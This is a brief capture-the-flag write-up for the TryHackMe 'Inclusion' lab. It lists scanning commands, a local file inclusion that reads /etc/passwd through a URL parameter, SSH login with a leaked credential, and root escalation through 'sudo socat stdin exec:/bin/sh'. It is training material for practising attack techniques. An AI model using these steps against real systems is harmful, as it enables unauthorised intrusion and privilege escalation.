TryHackMe: Inclusion

[Enumeration]

1. Port Scan

nmap -Pn <ip>

2. High port scan

nmap -Pn -p1000- <ip>

Not much useful

3. OS and services scan

nmap -p 22,80 -A <ip>

4. Vulnerability scan

nmap -p 22,80 --script vuln <ip>

Not much useful

5. Access HTTP site on port 80

View page source

Explore all pages

Try to input some value to parameter.

6. Directory discovery

gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html

Not much useful

[Exploitation]

1. LFI

Seems like with “http://<ip>/article?name=”, I can read /etc/passwd.

View page source for easier viewing.

There’re 2 users: root and falconfeast.
Also there’s credential comment - falconfeast:rootpassword

Try to login into SSH with the credential.

ssh falconfeast@<ip>

Success!!!

ls
cat user.txt

[Privilege escalation]

1. sudo

sudo -l

There’s socat.

Look up at GTFOBin

sudo socat stdin exec:/bin/sh
id

Now I’m root.

ls
cat root.txt